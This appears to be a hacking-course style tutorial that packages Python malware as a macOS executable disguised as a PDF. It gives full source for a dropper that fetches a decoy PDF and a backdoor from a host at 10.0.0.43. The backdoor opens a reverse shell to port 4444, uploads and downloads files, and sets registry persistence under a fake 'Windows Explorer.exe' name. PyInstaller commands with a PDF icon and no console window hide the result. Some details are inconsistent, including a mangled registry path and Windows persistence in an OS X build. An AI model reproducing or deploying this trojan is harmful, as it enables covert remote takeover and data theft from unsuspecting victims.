Convert Python Programs to OS X Executables
https://files.pythonhosted.org/packages/4a/08/6ca123073af4ebc4c5488a5bc8a010ac57aa39ce4d3c8a931ad504de4185/pip-19.3-py2.py3-none-any.whl
Install the pyinstaller on OS X.
pip3 install pyinstaller
Modify the Python Code - download_and_execute.py
#!/usr/bin/env python import os import subprocess import requests import tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as out_file: out_file.write(get_response.content) temp_directory = tempfile.gettempdir() os.chdir(temp_directory) download("http://10.0.0.43/evil-files/sample.pdf") subprocess.Popen("open sample.pdf", shell=True) download("http://10.0.0.43/evil-files/reverse_backdoor.py") subprocess.call("python reverse_backdoor.py", shell=True) os.remove("sample.pdf") os.remove("reverse_backdoor.py")
Modify the Python code - reverse_backdoor.py.
#!/usr/bin/env python import json import socket import subprocess import os import base64 import sys import shutil import tempfile def resource_path(relative_path): try: base_path = sys._MEIPASS except Exception: base_path = tempfile.gettempdir() return os.path.join(base_path, relative_path) class Backdoor: def __init__(self, ip, port): self.become_persistent() self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.connection.connect((ip, port)) def become_persistent(self): evil_file_location = os.environ["appdata"] + "\Windows Explorer.exe" if not os.path.exists(evil_file_location): shutil.copyfile(sys.executable, evil_file_location) subprocess.call( 'reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v test /t REG_SZ /d "' + evil_file_location + '"', shell=True) def reliable_send(self, data): json_data = json.dumps(data).encode() self.connection.send(json_data) def reliable_receive(self): json_data = "" while True: try: json_data = json_data + self.connection.recv(1024).decode() return json.loads(json_data) except ValueError: continue def change_working_directory_to(self, path): os.chdir(path) return "[+] Changing working directory to " + path def execute_system_command(self, command): DEVNULL = open(os.devnull, "wb") return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL) def read_file(self, path): with open(path, "rb") as file: return base64.b64encode(file.read()) def write_file(self, path, content): with open(path, "wb") as file: file.write(base64.b64decode(content)) return "[+] Upload successful." def run(self): while True: command = self.reliable_receive() try: if command[0] == "exit": self.connection.close() sys.exit() elif command[0] == "cd" and len(command) > 1: command_result = self.change_working_directory_to(command[1]) elif command[0] == "upload": command_result = self.write_file(command[1], command[2]) elif command[0] == "download": command_result = self.read_file(command[1]).decode() else: command_result = self.execute_system_command(command).decode() except Exception: command_result = "[-] Error during command execution." self.reliable_send(command_result) #file_name = resource_path(os.path.dirname(os.path.abspath(__file__))) + "/sample.pdf" file_name = tempfile.gettempdir() + "/sample.pdf" print(file_name) #subprocess.Popen(file_name, shell=True) try: my_backdoor = Backdoor("10.0.0.43", 4444) my_backdoor.run() except Exception: sys.exit()
Prepare an icon file(pdf.icns).
Convert the Python to OS X executable.
pyinstaller --onefile --noconsole --icon pdf.icns download_and_execute.py